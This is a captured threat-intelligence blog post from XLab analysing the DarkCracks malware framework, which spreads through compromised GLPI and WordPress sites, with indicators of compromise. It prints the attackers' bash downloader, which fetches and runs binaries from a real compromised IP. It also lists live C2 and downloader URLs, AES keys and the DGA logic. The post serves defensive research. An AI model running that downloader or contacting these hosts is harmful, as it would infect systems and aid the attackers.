blog.xlab.qianxin.com
Open in
urlscan Pro
240e:c3:2002:5::e8
Public Scan
URL:
https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/
Submission: On September 30 via api from IN — Scanned from GB
Submission: On September 30 via api from IN — Scanned from GB
Form analysis
0 forms found in the DOMText Content
奇安信 X 实验室 * Home * About * EN Botnet UNCOVERING DARKCRACKS: HOW A STEALTHY PAYLOAD DELIVERY FRAMEWORK EXPLOITS GLPI AND WORDPRESS * * * ALEX.TURING, ACEY9, TF0XN 2024年9月4日 • 22 min read 1. Summary 2. Discovery Journey 3. Targeted Victims 4. Timeline 5. Technical Details 1. Part 1: Downloader Analysis 1. 0x01: Metasploit Stager 2. 0x02: Bash Script 2. Part2: Runner Analysis 1. 0x01: Decrypting Sensitive Strings 2. 0x02: Decryption Configuration 3. 0x03: Persistence Mechanism 4. 0x04: Downloading the Encrypted Client 5. 0x05: Decrypting and Executing the Client 3. Part3: Client Analysis 1. 0x01: C2 Communication 2. 0x02: Speculations on the Launcher Component 3. 0x03: Evolution of the Client 4. Part4: C2 Panel Analysis 5. Part5: ftMQPwsMnB Analysis 1. 0x01: Initial Analysis 2. 0x02: QuasarRAT Payload 6. Conclusion 7. IOC 1. MD5 2. Downloader 3. C2 (Victims) 4. DGA C2 1. 202301-202312 2. 202401- 202408 5. C2 6. Configs 1. Github 2. Pastebin 7. Appendix 1. IDA Script 2. CyberChef SUMMARY XLab's Cyber Threat Insight and Analysis system(CTIA) recently detected a sophisticated malicious payload delivery and upgrade framework, which we have named DarkCracks. This framework is characterized by its zero detection rate on VirusTotal, high persistence, stealth, and a well-designed upgrade mechanism, leveraging high-performance, stable online infrastructure as its backbone. Based on our data, DarkCracks is a meticulously crafted malware, indicating that its creators are far from mere script kiddies. While we have mapped out its payload delivery and upgrade framework, the high level of stealth employed by DarkCracks has left us with limited visibility into its Launcher component as of now. However, on August 26th, we observed a new password-protected PDF file named "resume" being added to the github repository. This file was later renamed to the Korean name "김영미 이력서" (Kim Young-mi's resume). Given the commonality of this Korean name, we strongly suspect that part of this component’s functionality involves social engineering activities targeting Korean-speaking users. DarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers. These compromised sites are used to collect sensitive information from infected devices, maintain long-term access, and serve as relay nodes to control other devices or deliver malicious payloads, effectively masking the attacker’s tracks. Within our monitoring scope, targeted entities include public service systems across different countries, such as school websites, public transportation systems, and even prison visitor systems. DISCOVERY JOURNEY On June 5, 2024, CTIA issued an ELF_Downloader alert for the network traffic associated with ELF file 8b3d2b156424e5a0dc3f6d2b0dec96b2. The traffic, HTTP in nature, was traced to the download path /vendor/sabre/event/lib/Promise/wk8dnj2k-x64-musl, which exhibited unusually deep directory structures, raising suspicions of a potential breach. Upon further investigation, we confirmed that the server at IP 45.169.87.67 had been compromised, with the attack surface being the GLPI system running on that IP. The file wk8dnj2k-x64-musl was identified as a Runner, responsible for decrypting a JSON configuration file specified by its parameters, downloading, decrypting, and executing the Client designated in the clientUrl field. The Client's role is to report the compromised device's information, driven by C2-issued configuration files, and to download updates for the Runner, Client, Launcher, and other components. As of now, both Runner and Client components have a zero detection rate on VirusTotal, indicating that they have been operating stealthily under the radar of security vendors for over a year. On June 12, 2024, another download script, f8a495a98c43b0805f53be14db09c409, came to our attention. It utilized a similar download path, /vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl. This file was strikingly similar to wk8dnj2k-x64-musl, and the server at IP 179.191.68.85, also running GLPI services, was found to host it. The appearance of similar files with different names, hosted on different servers and paths, strongly indicated the presence of an unknown attacker actively breaching GLPI systems and leveraging compromised devices as infrastructure to conduct their cybercriminal activities. To trace the origins, we embarked on a thorough investigation, uncovering key insights into the samples, configuration files, C2 servers, and targeted victims. 1. The compromised systems were found to belong to critical infrastructure across different countries, including school websites, public transportation systems, and prison visitor systems. 2. Through the XLab command tracking system, we intercepted a directive to change the C2 server, which pointed to a compromised WordPress site. 3. We discovered a GitHub project named "soduku1," created on July 11, 2023, which stored configuration files. 4. On VirusTotal, we identified an ELF file, c447f7980a18205f309d8432f312fe69, sharing the same origin as the Client. The file contained a source path /home/erin/Desktop/Works/smart-update/SmartUpdate/client. 5. XLab proactively contacted the victims, gaining access to the C2 Panel, ultimately uncovering the workings of the "Admin Mode." 6. Additionally, we found another GitHub project, "ftMQPwsMnB," containing a decoy file titled "김영미 이력서" (Kim Young-mi's resume) and QuasarRAT. In conclusion, a well-designed malicious payload delivery and upgrade framework, active for over a year, has come into sharp focus. This framework, which we have named DarkCracks based on the use of the XOR key "Crackalackin," leverages compromised GLPI and WordPress sites as Downloaders and C2 servers. Its primary objectives are to gather sensitive information from infected devices, maintain long-term access, and use the compromised, stable, high-performance devices as relay nodes to control other devices or deliver malicious payloads, effectively obfuscating the attacker’s footprint. The high persistence, stealth, and sophisticated upgrade design, coupled with the strategic selection of stable online infrastructure, suggest that the attackers behind this framework are far from ordinary script kiddies. Despite our current inability to capture the Launcher component and monitor DarkCracks' further activities, the fact that it has remained undetected by security products for over a year underscores the stealth and efficiency of its attack methods. This warrants serious attention, and we have documented our findings to share with the security community. TARGETED VICTIMS DarkCracks assigns different roles based on the performance of the victim's device: high-performance devices handle infrastructure roles, such as C2 and Downloader, while lower-performance devices act as Bot nodes. DarkCracks targets include WordPress and GLPI. WordPress is a globally recognized web content management system, which I won't elaborate on here. GLPI (Gestionnaire Libre de Parc Informatique) is a lesser-known open-source IT asset and service management system, used to help organizations manage their IT assets, including hardware, software, and network devices. It is widely used in small to medium-sized enterprises, educational institutions, and government agencies to enhance IT infrastructure management and maintenance. Among the 13 C2/Downloader instances we observed (compromised devices), there are important targets involving city public transport systems, prison visitor scheduling systems, financial institutions, and other key organizations across various countries. According to QiAnXin EagleMap, 10,157 GLPI services are currently exposed online. Organizations using GLPI should urgently check and secure their systems. TIMELINE Based on the information we have gathered, we have compiled the following timeline of DarkCracks' activities. Please note that this is only based on our current intelligence, and DarkCracks' actual activities may have started earlier. * 2023.07.11: The user "adrhpbrn29" created the project "soduku1" to store backup configuration files. * 2023.07.18: An unencrypted Client was uploaded to VirusTotal from China, with sensitive strings left unencrypted. * 2024.05.23: Runner samples were uploaded to VirusTotal from Poland, South Korea, the Netherlands, the UK, Germany, and the US. The sensitive strings in these samples were fully encrypted. * 2024.06.05: DarkCracks Downloader was first detected when XLab discovered that the IP address 45.169.87.67 had been compromised, hosting multiple Runners (including the ones from May 23rd), configuration files, and Client downloads. * 2024.06.06: Analysis of the Runner was completed, successfully decrypting the configuration files and Client. It was found that backup configurations were stored on GitHub, with a version number of SUC 2.0. Some CPU architecture samples supported DGA (Domain Generation Algorithm). * 2024.06.10: An updated C2 command was intercepted, indicating that the new C2 server was a compromised WordPress site. * 2024.06.12: The IP address 179.191.68.85 was found to be compromised, serving as a download server for DarkCracks. Backup configurations were stored on Pastebin with a version number of SUC 2.01, with all CPU architectures supporting DGA. * 2024.06.14: A victim provided XLab with implants left by the hackers on their device, including a C2 panel, configuration files, etc. * 2024.07.23: Another Runner sample was uploaded to VirusTotal from Finland, Japan, and the US. This sample did not have encrypted sensitive strings and did not support DGA. * 2024.08.23: The user "adrhpbrn29" created the project "ftMQPwsMnB" to distribute QuasarRAT. TECHNICAL DETAILS Next, we'll start with the Downloader and gradually introduce the key components of DarkCracks: Runner, Client, Launcher, and the C2 Panel. By thoroughly analyzing the functions of each component, we aim to clarify the framework's design principles and uncover how DarkCracks covertly delivers its payloads through these elements. PART 1: DOWNLOADER ANALYSIS Regarding the Downloader, we've observed two distinct forms: one is a Metasploit Stager that first receives shellcode to build a shell execution environment before executing a wget download; the other is a bash script that directly downloads files via wget or curl. 0X01: METASPLOIT STAGER MD5: 8b3d2b156424e5a0dc3f6d2b0dec96b2 Magic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked The Stager communicates with 213.139.233.163:18441, generating network traffic as shown below. Its purpose is to request the file wk8dnj2k-x64-musl from 45.169.87.67. The file wk8dnj2k is, in fact, DarkCracks' Runner component. On 45.169.87.67, we discovered multiple variants of the Runner (wk8dnj2k-{cpu}-{compiler}) compiled for ARM, MIPS, and x86/64 CPU architectures using different compilers like gnu, uclibc, and musl. We also found encrypted Client files (se3hf6jwc-{cpu}-{compiler}) and encrypted configuration files (qoakeifm-unknown.txt). 0X02: BASH SCRIPT MD5: f8a495a98c43b0805f53be14db09c409 Magic: Bourne-Again shell script text executable The script's functionality is straightforward: it requests pQ1iM9hd-x64-musl and j8UgL3v from 179.191.68.85. The former is a Runner, while the latter is an encrypted configuration file. #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget "http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl" -O wdvsh|curl "http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl" -o wdvsh; wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr|curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr; chmod +x ./wdvsh; ./wdvsh agr; sleep 3; rm ./wdvsh; rm ./agr; Similarly, 179.191.68.85 also hosts various DarkCracks entities for different CPU architectures. PART2: RUNNER ANALYSIS The Runner hosted on 45.169.87.67, identified as wk8dnj2k-{cpu}{compiler}, is version 2.0, while the pQ1iM9hd series from 179.191.68.85 is version 2.01. The differences between them are minimal. This analysis focuses primarily on the wk8dnj2k Runner for the x64 CPU architecture. Below is its basic information: Name: wk8dnj2k-x64 MD5: 93a7cba1edbacb633021ebc38c10a79f Magic:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, stripped As the name suggests, the Runner’s primary function is to act as a launcher, responsible for downloading, decrypting, and executing the Client. Specifically, when the Runner executes, it first checks the runtime parameters and supports a maximum of one parameter: an encrypted JSON configuration file. A valid configuration file, once decrypted, must include at least three fields: key (the key and IV needed to decrypt the Client), emUrl (the download address for the backup configuration file), and clientUrl (the download address for the encrypted Client). Upon validating the configuration file, the Runner creates a working directory at /var/tmp/.shm, moves itself to that directory, and renames itself to a UUID-formatted filename. It then generates a new encrypted file, 2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1, with the SH3 field containing the content of the original configuration file. The Runner achieves persistence through methods like crontab, .bash_profile, or /etc/init.d/rnd. Finally, it downloads, decrypts, and executes the Client. If no parameter is specified, the Runner checks for the existence of the file /var/tmp/.shm/2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1, retrieves the configuration file through the SH3 field, and proceeds with the decryption, download, and execution of the Client. 0X01: DECRYPTING SENSITIVE STRINGS To protect its functionality from easy detection, the Runner pre-encrypts sensitive strings and decrypts them as needed using the decstr function. To decrypt these strings, one can use flare_emu to emulate the decstr function. For example, the ciphertext “9MwEVEVWWExM5AkO” corresponds to the plaintext “clientUrl.” import flare_emu def ignorefree(eh, address, argv, funcName, userData): eh.uc.reg_write(eh.regs["rax"], 0) ciphertxt=b'9MwEVEVWWExM5AkO' eh=flare_emu.EmuHelper() eh.apiHooks['free']=ignorefree eh.emulateRange(startAddr=0x00000000000F9D0,skipCalls=False,registers={'rdi':ciphertxt}) print(eh.getEmuString(eh.getRegVal('ret'))) Of course, as a security analysis, a simple black-box decryption is insufficient. After thorough examination, the decryption logic of the decstr function can be broken down into three steps: 1. Reverse the string and decode it using Base64 URLSafe mode. 2. XOR each byte with “Crackalackin’”. 3. Swap the case of English letters and decode again using Base64 URLSafe mode. Using the IDAPython script in the appendix, the encrypted strings can be restored and patched, making reverse engineering much easier. 0X02: DECRYPTION CONFIGURATION We captured two configuration files, qoakeifm-unknown and j8UgL3v. These files use the same encryption method as the sensitive strings. Once decrypted, it’s noteworthy that the emUrl directs to backup configurations stored on third-party platforms like GitHub and Pastebin. * Configuration file qoakeifm-unknown from 45.169.87.67: * Configuration file j8UgL3v from 179.191.68.85: Each field in the configuration file is described in the table below: Item Description key AES KEY&IV url Client Report Entry authHeader Auth String emUrl Backup Config runnerUrl Runner Download URL clientUrl Client Download URL 0X03: PERSISTENCE MECHANISM Upon successfully decrypting a valid configuration file, the Runner creates the working directory /var/tmp/.shm, moves itself to that directory, renames itself with a UUID, and generates a new encrypted configuration file, 2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1. After move the file, the Runner achieves persistence using one of the following methods: 1. If the device supports crontab, it uses crontab for persistence. 2. If crontab is unavailable and the current user is a regular user, persistence is achieved through .bash_profile. 3. If crontab is unavailable and the current user is root, persistence is achieved through /etc/init.d/rnd. 0X04: DOWNLOADING THE ENCRYPTED CLIENT The Runner attempts to download the encrypted Client by iterating through three different types of URLs. If any of them succeed, the loop exits; otherwise, it waits 6 to 18 hours before trying again. We refer to this as the three-layer URL task polling. * clienturl: Direct mode. Simply concatenate the CPU architecture string of the sample to get the Client’s download address. * emurl and dgaurl: Indirect mode. They first download the page pointed to by the URL, locate the backup configuration using the seed_string, then decrypt it to obtain the new clienturl. This forms a redundant structure where the first layer (clienturl) typically points to compromised sites, which are unstable and may be cleaned up. The second layer (emurl) points to third-party content hosting platforms, which are more stable but still carry a risk of being banned. The final layer (dgaurl) is generated monthly as a last resort. EMURL The process for handling clienturl is straightforward, so let’s focus on emurl and dgaurl. For example, the emurl in the qoakeifm-unknown configuration file (https://raw.githubusercontent.com/adrhpbrn29/sudoku1/main/main.cpp) contains the following backup configuration in the seed_string variable. After decrypting the seed_string, the Runner re-enters direct download mode upon obtaining the clienturl. The sudoku1 project was created on July 11, 2023, at 17:08:29, with the first record containing seed_string submitted at 17:24:02. Currently, there are six submission records. Commit Date authHeader e1e10dc 2024.03.28 LJHRQWE abb67fc 2024.03.13 LJHRQWE 6392b06 2023.12.27 LJHRQWE c72963b 2023.10.04 SLDJKFA 248c8a8 2023.10.04 Linux Max 5970967 2023.07.11 Rbz021g6 Using git diff, we verified all submission records and found changes concentrated in the seed_string variable in main.cpp, from which we extracted six different clienturl and C2url (details in the IOC section under GitHub). In the configuration file j8UgL3v, the emurl is https://pastebin[.]com/raw/GYEBVyMR. Besides providing the aforementioned seed_string (details can be found in the Pastebin section of the IOC), it also gives us another perspective: the IP statistics of visitors to this page. Currently, the number of unique IPs accessing this page is approaching 300. DGAURL The logic for handling dgaurl is similar to emurl, but the difference lies in their source. While emurl comes from the configuration file, dgaurl is algorithmically generated. The algorithm is simple: a domain is generated monthly by formatting the current “year&month” as “%d%02d”, encrypting it with the string encryption algorithm described earlier, and then appending it to “http://%s.com” to form the dgaurl. For example, the DGA domain generated for “202408” is UVDFUgOAgjL.com. We checked the dgaurl from 2023 to the present (details in the IOC section under DGA) and found that all domains are unregistered. This indicates that DarkCracks has remained well-hidden, with the emurl mechanism undetected by the security community, so much so that they haven’t felt the need to activate the final emergency measure. 0X05: DECRYPTING AND EXECUTING THE CLIENT The Client is encrypted using AES CBC mode, with the decryption key and IV provided in the configuration file’s key. The key is a hex string where the first 16 bytes are the key and the last 16 bytes are the IV. The keys in the two captured configuration files are identical: 2D8C7FEE42D3DB4A8E55FBFF65351E1BB8ADDBA8FCBD0F85EE1CA5033D0DF342. * AES Key: 2D 8C 7F EE 42 D3 DB 4A 8E 55 FB FF 65 35 1E 1B * AES IV: B8 AD DB A8 FC BD 0F 85 EE 1C A5 03 3D 0D F3 42 Once the Runner successfully decrypts the Client, it saves it in the /tmp directory, launches it using the execl function, and deletes itself. PART3: CLIENT ANALYSIS In this section, we'll focus on analyzing the se3hf6jwc-x64 Client. Below are its basic details before and after decryption (interested readers can use the CyberChef script provided in the appendix to decrypt the Client). Name:se3hf6jwc-x64 MD5:81eccc9c10368aa54cfed371f83da45a MD5:fe5f484f71bf0fd7afa56e60da7eec6f (Decrypted) Magic:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, stripped Upon analysis, we confirmed that the Client uses a similar architecture to the Runner, namely a "configuration file-driven + three-layer URL task polling" structure. However, unlike the Runner, which primarily polls the clientUrl, the Client's focus is on the C2 reporting endpoint specified in the url field of the configuration file. The Client encrypts and reports sensitive device information to the C2 server, which then sends back encrypted configurations that drive the execution of different tasks. Key tasks include: * NewVersion: Download and update the Runner and Client. * NewLauncherVersion: Download and update the Launcher. * versionCheckerUrl: Update the C2 reporting endpoint. 0X01: C2 COMMUNICATION The Client constructs a JSON-formatted beacon with the following code snippet, encrypts it, and sends it as the HTTP body to the C2 server. The Client supports both HTTP and HTTPS. Notably, the platform field's value is formatted as "arch/user(euid)/version", with the version obtained from /proc/version. As seen in actual captured traffic, the body of the interaction is encrypted. After decrypting the C2 response, we see that the Client receives a message with a versionCheckerUrl field. The Client then updates its C2 reporting endpoint and requests a new configuration file: { "versionCheckerUrl": "https:\\/\\/www.miracles.com.hk\\/wp-content\\/plugins\\/foxiplugin\\/detail.php", "authHeader": "Linux MaEW" } 0X02: SPECULATIONS ON THE LAUNCHER COMPONENT While we have not captured the Launcher component, we can infer the following details based on how the Client handles NewLauncherVersion: * The Launcher is stored encrypted on a remote server, using AES encryption. * The Launcher likely supports the same encryption algorithm as the Runner and Client. * The Launcher is also driven by a configuration file, with core configurations stored at /var/tmp/.shm/9d8dadaf-6c7e-4975-b26d-ec17e67493c6. 0X03: EVOLUTION OF THE CLIENT We compared the 2.0 and 2.01 versions of the Client samples. The primary differences are whether sensitive strings are encrypted and whether the Client supports the DGA algorithm. These changes seem aimed at enhancing the Client's stealth and robustness. Version Encrypted String DGA Support SUC 2.0 N (x86/x64 Y) N (x86/x64 Y) SUC 2.01 Y Y Interestingly, even in SUC 2.0, the x86/64 architecture Client already supported sensitive string encryption and DGA features. This indicates that DarkCracks takes a cautious approach to feature upgrades, initially testing new features on select architectures before rolling them out to all architectures once they are fully functional and stable. PART4: C2 PANEL ANALYSIS A user whose device was compromised provided us with the C2 Panel files. Below is the basic information about the file: MD5: 8103a187a710378020dbdee8ff213b5b MD5: 69ef27f8e69dbba222c3c33a53906d79 (Deobfuscate) Obfucation: Yes The file is heavily obfuscated, but it can be deobfuscated by gradually replacing eval with print. The C2 Panel is implemented in PHP and consists of around 600 lines of code. Its functionality is relatively simple and can be summarized as handling requests from different sources based on a hardcoded configuration file, tem9FG5.tmp. It operates in two modes: management mode and business mode. * Management Mode: This mode handles requests from the Bot Master. The C2 Panel performs operations like adding, deleting, modifying, and querying the configuration file based on the request. * Business Mode: In this mode, the C2 Panel decides whether to log the Bot or respond to it based on the configuration file. REQUEST SOURCE IDENTIFICATION The C2 Panel distinguishes the request source using the authentication field. If the field's value is Statistics, the request is from the Bot Master; otherwise, it's from a Bot. Another role of the authentication field is to verify whether the request is from a legitimate Bot. Each C2 Panel has a specific authHeader set during initialization, and the C2 only responds when the Bot's authentication matches the C2's authHeader. CONFIGURATION FILE (TEM9FG5.TMP) The configuration file, tem9FG5.tmp, acts like a database, recording the Bot Master's settings and storing information about the Bots. To understand the format and fields supported by this configuration file, we generated a configuration file by sending two test requests to a test machine, simulating the initialization and Bot check-in. 1. Initialize the Configuration {"authentication":"Statistics","isActive":true,"authHeader":"XLab"} 2. Bot Check-in {"authentication":"XLab","uuid":"fac60bdc-5786-415e-8992-79abcb132d64","platform":"x64 / root(0) / Linux","interval":8867000,"version":"SUC 2.01","launcherVersion":""} The generated network traffic is as follows: The C2 Panel on the test machine generated the following encrypted configuration in response to the above requests: Decrypting the configuration file is straightforward, requiring the use of strrev(convert_uudecode($input)). The decrypted plaintext matches our constructed requests, indicating that the configuration file is in JSON format. Bot-related information is stored in the clients field, while the authHeader is stored in the config field. Below is a description of the fields supported in the configuration file: Field Description config C2 Status clients Bot info pendingChanges Config to be delivered sessions Command output from Bot sessionCommands Commands to be delivered The Bot Master uses the pendingChanges and sessionCommands fields to deliver instructions to the Bot. The following code snippet illustrates how the C2 Panel checks the client's uuid to decide whether to issue the Launcher configuration. The configuration file provided by the victim mentioned a compromised site, soussanart.com. We sent a client query request to this site and obtained information about 76 clients, spread across 17 countries and involving 4 different versions, ranging from 1.2 to 2.02. This concludes our analysis of DarkCracks. Clearly, many puzzles remain unsolved, and we believe this is just the beginning of uncovering the full extent of this threat. PART5: FTMQPWSMNB ANALYSIS On August 23, 2024, as we were wrapping up our previous analysis, we noticed that the user adrhpbrn29 had created a new project named ftMQPwsMnB. The project contains a single compressed file named bzupdater.zip, which includes three files: config.ini, Updater.exe, and version.dll. 0X01: INITIAL ANALYSIS A quick analysis confirmed that version.dll is malicious. Its function is to use the AES algorithm to decrypt a binary resource, which ultimately yields a shellcode. This shellcode loads a payload that is an open-source remote control trojan, QuasarRAT. The AES key is FCFF50FB13B09C44F806CF4947381718, and the IV is 2DD695D6845AA9F83F0071B709D78CBD. In addition to AES, XOR encryption is used to decrypt strings, with the XOR key being quackquack. Currently, the ftMQPwsMnB project has five commit records. Although the MD5 hash of version.dll varies with each commit, there are actually only three different core binaries. Commit MD5 of version.dll MD5 of "Binary" 7ddc62e 456d05566fc3391e195a5f9cb346c92c 91bcbf4de7ff8bddebdc49b62cad1ac1 ab75b85 c2d69f5e5fa2af8131f1cb3d9fdfbd4b 05481286a1aa1f0d7d9df7bbbb3aeb73 ab6a892 9e94126e8a26efd10b2a5b179d64be90 05481286a1aa1f0d7d9df7bbbb3aeb73 271b28c ceb7f3d92096892410e041a3b318ab9b 05481286a1aa1f0d7d9df7bbbb3aeb73 653eb26 ca93591a9441a2ade70821f67292d982 6176c8374cd656783c9b354944c8052e 0X02: QUASARRAT PAYLOAD QuasarRAT is a well-known remote access Trojan (RAT), and there are numerous analyses available online for those interested. In this case, the configurations for the three shellcodes delivering QuasarRAT are nearly identical, differing mainly in the C2 server port. For example, the QuasarRAT delivered by the ab75b85 commit has the following configuration: As of now, we haven't identified the exact distribution method for this project. However, the config.ini file references Bandisoft, a paid software, suggesting that one potential distribution method could be enticing users to download and install the software by offering a cracked version for free. 0X03: SUSPICIOUS PDF FILE On August 26, the project received two additional commit records, adding a PDF file initially named resume.pdf. This file is password-protected, so we currently do not know its contents. About 50 minutes later, the file was renamed to the Korean title 김영미 이력서.pdf, which translates to "Kim Young-mi's resume." Resumes are common phishing lures, leading us to speculate that one of DarkCracks' targets might be Korean-speaking users. Date Commit Filename MD5 2024/08/26 09:19:32 5130de3 resume.pdf 71ebe71eec7e0f2420cd931534dd22c3 2024/08/26 10:09:27 a04bf51 김영미 이력서.pdf 71ebe71eec7e0f2420cd931534dd22c3 CONCLUSION DarkCracks is a well-designed yet flexible payload delivery and upgrade framework with several outstanding advantages. For instance, its three-layer URL polling mechanism provides robust reliability, ensuring that payloads can be delivered even when some delivery methods fail. The framework’s use of encrypted delivery for multiple components, along with the self-deletion of these components after execution, effectively safeguards its core functionalities from detection. However, there are notable shortcomings. One significant vulnerability lies in its use of a reversible algorithm for delivering backup configurations via DGAUrl, which poses the risk of the entire network being hijacked. Additionally, the C2 Panel’s management mode is easily accessible; anyone familiar with the protocol can modify or even wipe the configuration file, potentially leading to the C2’s shutdown and network paralysis. We recommend that network administrators monitor the /var/tmp/.shm directory as described above to detect potential infections. Victims are encouraged to contact us for technical support. This is the extent of our current knowledge on DarkCracks. Our analysis is based on our perspective and is undoubtedly limited. We invite other industry experts with unique insights to contribute additional information, helping us refine the profile of DarkCracks. If you are interested in our research, you can also contact us via the X platform to obtain more detailed information. IOC MD5 Runner c30e9934299fd43527834086b6cfa26a *pQ1iM9hd-armv5-uclibc 8c53e98685fc3ce8b86055991b905926 *pQ1iM9hd-armv6-gnu 257c9ec1241b3fa59565edec9689276b *pQ1iM9hd-armv8-gnu 281e4ede8ffc0f854ce671b5b3ae06f8 *pQ1iM9hd-mips-uclibc 21732589b41506e1e7de87d7066ea43e *pQ1iM9hd-mipsel-uclibc 93a7cba1edbacb633021ebc38c10a79f *pQ1iM9hd-x64 036d6c73fe7a568160f3de8a98d0a58b *pQ1iM9hd-x64-musl 5340ee724893fd596852f22ecbc3e795 *pQ1iM9hd-x86 c6909b8b8bc55fac85c5fe650c7df42a *wk8dnj2k-armv5-uclibc 227d19736af70bef817da96668994af8 *wk8dnj2k-armv6-gnu a18957196842c78cbce2247d766712ad *wk8dnj2k-armv8-gnu 0dd9e350aafe0d1c9e619d27ebd2ccfd *wk8dnj2k-mips-uclibc 8859d9b1c3f41b9dad3cee68adaddd92 *wk8dnj2k-mipsel-uclibc 93a7cba1edbacb633021ebc38c10a79f *wk8dnj2k-x64 e587cd53059f58526be7e2167cf7177b *wk8dnj2k-x64-musl 5340ee724893fd596852f22ecbc3e795 *wk8dnj2k-x86 Client af93dc3d635ed3b46439e38fae8ecf6b *mY5bJK7e-armv5-uclibc b0f7df80d2adda176f8d58a55b773eed *mY5bJK7e-armv5-uclibc.decrypted 7d6ea278b5ae9081c03e340d6f98a4a5 *mY5bJK7e-armv6-gnu 635a7ae54cb7966d61e2e8f64391e870 *mY5bJK7e-armv6-gnu.decrypted c1d07c102e436284d3fbce0410658ae8 *mY5bJK7e-armv8-gnu 11d4db491fe82e37ff0a5c3787cfa143 *mY5bJK7e-armv8-gnu.decrypted 4e64816a821ce2eb231a5be5395a2f20 *mY5bJK7e-mips-uclibc 2e7d67a3be72c5d1718fc2689c0d5d08 *mY5bJK7e-mips-uclibc.decrypted 5e9bf8a980bcc4d004ff505778b843e6 *mY5bJK7e-mipsel-uclibc 527cc24f043c58101c122c2a2f6c6d8e *mY5bJK7e-mipsel-uclibc.decrypted 5b39497af0d9874d38288476d3a9f5a4 *mY5bJK7e-x64 dffee792a8e65d38d897bd3400aecd3d *mY5bJK7e-x64.decrypted 7515282b084374d9d8b87e46b87e4af8 *mY5bJK7e-x64-musl ee0d3c3c528034fa3ebdc37596014382 *mY5bJK7e-x64-musl.decrypted d41c379725973e97ef9cbafb1efdb2f3 *mY5bJK7e-x86 1d407ff91ce19afc82f7946c3ec24dea *mY5bJK7e-x86.decrypted a1f3e574799c3f874a8d3563dbc55f4c *se3hf6jwc-armv5-uclibc ad831d9c00c90fead925f4575f4a6a9a *se3hf6jwc-armv5-uclibc.decrypted 2b5df28714421d79ab3e63eac538d853 *se3hf6jwc-armv6-gnu 2107625e9980d190e3214ef09a83608f *se3hf6jwc-armv6-gnu.decrypted 35f846e24d0cccb5a3ec736c07f6a0a2 *se3hf6jwc-armv8-gnu 5fbe460fc8fa09dc6adc73e5e908cd0e *se3hf6jwc-armv8-gnu.decrypted 27f18a27942fbb71c4e84736db45b5cf *se3hf6jwc-mips-uclibc e1674821a190f5250e6aba40916c9061 *se3hf6jwc-mips-uclibc.decrypted b1040f3193d4bec01b13bc73ecaa2587 *se3hf6jwc-mipsel-uclibc 7c33c052c5d451ba4069639286dfc4b5 *se3hf6jwc-mipsel-uclibc.decrypted 81eccc9c10368aa54cfed371f83da45a *se3hf6jwc-x64 fe5f484f71bf0fd7afa56e60da7eec6f *se3hf6jwc-x64.decrypted 08169e20daaad052075bd4026c8e287f *se3hf6jwc-x64-musl 2caf09452e79390f09bebf27dad9acf4 *se3hf6jwc-x64-musl.decrypted 5421bc92f2dd8f37538c2023c1e2f8ee *se3hf6jwc-x86 7168f47f067d260c34543e32a7a55cbd *se3hf6jwc-x86.decrypted Config 4e52426a96baf84431775adf2d6f0ae2 *j8UgL3v 4a642a86a8d8e71e5f163fa54eda9241 *qoakeifm-unknown.txt DOWNLOADER https://www.auntyaliceschool.site/wp-admin/maint/{se3hf6jwc|wk8dnj2k} http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/{mY5bJK7e|pQ1iM9hd} http://45.169.87.67/vendor/sabre/event/lib/Promise/{se3hf6jwc|wk8dnj2k} C2 (VICTIMS) http://187.190.1.137/vendor/guzzlehttp/guzzle/src/Exception/detail.php http://204.199.192.44/vendor/paragonie/sodium_compat/src/Core32/Poly25519.php http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php http://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php http://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php http://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php http://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php https://www.miracles.com.hk/wp-content/plugins/foxiplugin/detail.php http://152.67.11.54/wordpress//wp-admin/includes/sus.php DGA C2 202301-202312 kTD7YgOAgjL.com gTD7YgOAgjL.com sTD7YgOAgjL.com EVD7YgOAgjL.com AVD7YgOAgjL.com MVD7YgOAgjL.com IVD7YgOAgjL.com UVD7YgOAgjL.com QVD7YgOAgjL.com YTC7YgOAgjL.com kTC7YgOAgjL.com gTC7YgOAgjL.com 202401- 202408 kTDFUgOAgjL.com gTDFUgOAgjL.com sTDFUgOAgjL.com EVDFUgOAgjL.com AVDFUgOAgjL.com MVDFUgOAgjL.com IVDFUgOAgjL.com UVDFUgOAgjL.com C2 216.74.123.97 United States|California|Los Angeles AS834|IPXO LLC 213.139.233.163 Japan|Osaka|Osaka AS34985|ASN block not managed by the RIPE NCC CONFIGS GITHUB Address: https://github[.]com/adrhpbrn29/sudoku1 {"url":"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"LJHRQWE","clientUrl":"http://45.169.87.67/vendor/sabre/event/lib/Promise/se3hf6jwc","runnerUrl":"http://45.169.87.67/vendor/sabre/event/lib/Promise/wk8dnj2k"} {"url":"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"LJHRQWE","clientUrl":"https://www.auntyaliceschool.site/wp-admin/maint/se3hf6jwc","runnerUrl":"https://www.auntyaliceschool.site/wp-admin/maint/wk8dnj2k"} 